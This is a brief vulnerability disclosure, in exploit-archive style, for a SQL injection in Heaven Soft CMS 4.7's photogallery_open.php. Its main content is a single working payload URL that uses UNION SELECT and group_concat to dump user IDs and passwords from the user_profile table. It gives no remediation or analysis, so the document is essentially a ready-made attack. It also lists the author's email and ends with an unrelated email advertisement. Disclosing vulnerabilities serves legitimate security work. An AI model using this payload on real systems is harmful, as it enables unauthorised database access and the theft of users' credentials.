Heaven Soft CMS version 4.7 suffers from a remote SQL injection vulnerability.
4d1e739a3a302e7c256f696ae6f067d5a4fcec851898d9507cc0227f20853a8b
-------------------------------------------------------------------------------------------
Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability
-------------------------------------------------------------------------------------------
Author: CoBRa_21
Mail: uyku_cu@windowslive.com
Script Home: http://www.heavensoft.com.pk/
-------------------------------------------------------------------------------------------
Sql Injection:
http://localhost/[path]/photogallery_open.php?cid=-10%20union%20select%20group_concat%28user_id,0x3a,password%29+from+user_profile--
-------------------------------------------------------------------------------------------
Melekler Bize Aglar , Biz Halimize Guleriz......
_________________________________________________________________
Yeni Windows 7: Size en uygun bilgisayarı bulun. Daha fazla bilgi edinin.
http://windows.microsoft.com/shop